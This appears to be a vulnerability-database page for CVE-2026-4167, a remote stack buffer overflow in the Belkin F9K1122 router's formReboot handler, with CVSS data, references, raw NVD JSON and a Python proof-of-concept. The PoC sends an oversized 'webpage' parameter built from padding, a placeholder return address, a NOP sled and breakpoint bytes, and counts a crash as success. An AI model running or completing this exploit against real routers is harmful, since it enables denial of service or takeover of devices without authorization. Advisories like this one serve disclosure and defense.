CVE-2026-4167

Description

A vulnerability was determined in Belkin F9K1122 1.00.33. This affects the function formReboot of the file /goform/formReboot. This manipulation of the argument webpage causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Belkin F9K1122 固件版本 1.00.33 及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-4167 PoC - Belkin F9K1122 formReboot Stack Buffer Overflow
Note: This PoC is for educational and security research purposes only.
Unauthorized access to systems without permission is illegal.
"""

import requests
import sys

TARGET = "http://192.168.1.1"  # Router IP address
TARGET_URL = f"{TARGET}/goform/formReboot"

def create_exploit_payload():
    """
    Create malicious payload for stack buffer overflow
    Adjust payload based on target firmware analysis
    """
    # Buffer overflow payload - may need adjustment based on target
    # NOP sled + shellcode + return address overwrite
    padding = b"A" * 1000  # Overflow length - adjust based on analysis
    
    # Example: Overwrite return address with jump instruction
    return_address = b"\x42\x42\x42\x42"  # Placeholder - need to find correct address
    
    # NOP sled for reliability
    nop_sled = b"\x90" * 100
    
    # Minimal shellcode for demonstration (executes /bin/sh or calc)
    # This is a placeholder - use appropriate shellcode for target architecture
    shellcode = b"\xcc" * 50  # INT3 breakpoint for testing
    
    payload = padding + return_address + nop_sled + shellcode
    return payload

def exploit():
    """Send exploit payload to vulnerable endpoint"""
    print(f"[*] Targeting: {TARGET_URL}")
    print(f"[*] Generating exploit payload...")
    
    payload = create_exploit_payload()
    
    # Construct request data
    data = {
        "webpage": payload.decode('latin-1'),  # Send as form parameter
        "submit_button": "Reboot"
    }
    
    try:
        print("[*] Sending exploit request...")
        response = requests.post(TARGET_URL, data=data, timeout=10)
        print(f"[!] Response status: {response.status_code}")
        print(f"[!] Router may be rebooting or crashed")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        if "Connection" in str(e):
            print("[+] Target may have crashed - exploit successful")

if __name__ == "__main__":
    print("CVE-2026-4167 PoC - Educational Use Only")
    if len(sys.argv) > 1:
        TARGET = sys.argv[1]
        TARGET_URL = f"{TARGET}/goform/formReboot"
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4167
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4167
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4167/
[4] VulDB https://vuldb.com/cve/CVE-2026-4167
[5] https://github.com/Litengzheng/vul_db/blob/main/Belkin/vul_152/README.md
[6] https://github.com/Litengzheng/vul_db/blob/main/Belkin/vul_152/README.md#proof-of-concept-poc
[7] https://vuldb.com/?ctiid.351074
[8] https://vuldb.com/?id.351074
[9] https://vuldb.com/?submit.769727

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4167", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:56.130", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Belkin F9K1122 1.00.33. This affects the function formReboot of the file /goform/formReboot. This manipulation of the argument webpage causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se determinó una vulnerabilidad en Belkin F9K1122 1.00.33. Esto afecta la función formReboot del archivo /goform/formReboot. Esta manipulación del argumento webpage causa un desbordamiento de búfer basado en pila. El ataque puede ser iniciado remotamente. El exploit ha sido divulgado públicamente y puede ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://github.com/Litengzheng/vul_db/blob/main/Belkin/vul_152/README.md", "source": "[email protected]"}, {"url": "https://github.com/Litengzheng/vul_db/blob/main/Belkin/vul_152/README.md#proof-of-concept-poc", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351074", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351074", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.769727", "source": "[email protected]"}]}}